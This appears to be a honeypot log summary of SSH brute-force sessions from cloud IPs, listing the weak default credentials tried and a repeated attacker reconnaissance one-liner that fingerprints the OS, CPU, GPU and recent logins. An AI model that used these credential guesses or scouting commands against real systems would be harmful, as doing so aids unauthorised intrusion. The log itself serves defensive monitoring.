$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 pretzel_root_19 (134.122.94.93) — Frankfurt am Main, Germany · 4 sessions · 16 cmds

2026-03-02 06:05 EST · as root/12345678, root/admin, root/admin123

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 star_root_23 (147.182.174.96) — North Bergen, United States · 2 sessions · 8 cmds

2026-03-02 06:08 EST · as postgres/postgres, root/qwerty

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 tea_root (46.101.80.169) — Slough, United Kingdom · 14 sessions · 56 cmds

2026-03-02 05:04 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 14x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×14

$ uname -s -v -n -m 2 > /dev/null ×14

$ uname -m 2 > /dev/null ×14

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×14

🎭 lotus_root_17 (139.59.64.16) — Bengaluru, India · 5 sessions · 20 cmds

2026-03-02 05:09 EST · as admin/admin, root/admin, root/admin123

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 gouda_sol_9 (178.128.247.18) — Amsterdam, Netherlands · 8 sessions · 8 cmds

2026-03-01 18:49 EST · as sol/sol, solana/solana

Ran uname 8x across 8 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×8

↳ obfuscated system check

🎭 outback_root_6 (170.64.185.103) — Sydney, Australia · 2 sessions · 8 cmds

2026-03-02 05:10 EST · as admin/admin, admin/admin123

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 lotus_root_2 (143.110.179.250) — Bengaluru, India · 10 sessions · 40 cmds

2026-03-02 03:55 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 cipher_root_75 (85.11.167.125) — Sofia, Bulgaria · 1 session · 1 cmd

2026-03-02 04:57 EST · as root/1234

privilege check

$ whoami

↳ privilege check

🎭 dutch_root_13 (165.232.90.36) — Amsterdam, Netherlands · 9 sessions · 36 cmds

2026-03-02 04:02 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 9x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×9

$ uname -s -v -n -m 2 > /dev/null ×9

$ uname -m 2 > /dev/null ×9

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×9

🎭 moose_root_3 (178.128.234.160) — Toronto, Canada · 12 sessions · 48 cmds

2026-03-02 03:57 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 12x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×12

$ uname -s -v -n -m 2 > /dev/null ×12

$ uname -m 2 > /dev/null ×12

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×12

🎭 stein_root_6 (167.99.245.30) — Frankfurt am Main, Germany · 10 sessions · 40 cmds

2026-03-02 03:02 EST · as deploy/deploy, guest/guest, mysql/mysql

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 eagle_sol_4 (167.172.229.197) — Clifton, United States · 16 sessions · 16 cmds

2026-03-02 00:40 EST · as sol/123456, sol/sol, solana/solana

Ran uname 16x across 16 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×16

↳ obfuscated system check

🎭 specter_root_7 (157.245.159.154) — Singapore, Singapore · 5 sessions · 20 cmds

2026-03-02 02:54 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 beefeater_root_8 (206.189.117.155) — Slough, United Kingdom · 11 sessions · 44 cmds

2026-03-02 03:51 EST · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 11x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×11

$ uname -s -v -n -m 2 > /dev/null ×11

$ uname -m 2 > /dev/null ×11

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×11

🎭 cowboy_sol_9 (104.236.13.93) — Clifton, United States · 9 sessions · 9 cmds

2026-03-01 16:59 EST · as sol/sol, solana/solana, ubuntu/ubuntu

Ran uname 9x across 9 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×9

↳ obfuscated system check

🎭 fog_root_15 (161.35.169.110) — Slough, United Kingdom · 5 sessions · 20 cmds

2026-03-02 03:28 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 monsoon_root_10 (134.209.148.241) — Bengaluru, India · 3 sessions · 12 cmds

2026-03-02 03:32 EST · as root/12345678, root/admin, root/qwerty

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 bike_root_14 (209.38.46.103) — Amsterdam, Netherlands · 1 session · 4 cmds

2026-03-02 03:34 EST · as root/qwerty

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 star_root_24 (159.89.51.92) — North Bergen, United States · 1 session · 4 cmds

2026-03-02 03:28 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 stein_root_7 (165.22.79.3) — Frankfurt am Main, Germany · 6 sessions · 24 cmds

2026-03-02 03:01 EST · as admin/password, root/12345678, root/qwerty

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 dutch_root_4 (159.223.236.204) — Amsterdam, Netherlands · 10 sessions · 40 cmds

2026-03-02 02:24 EST · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 10x)

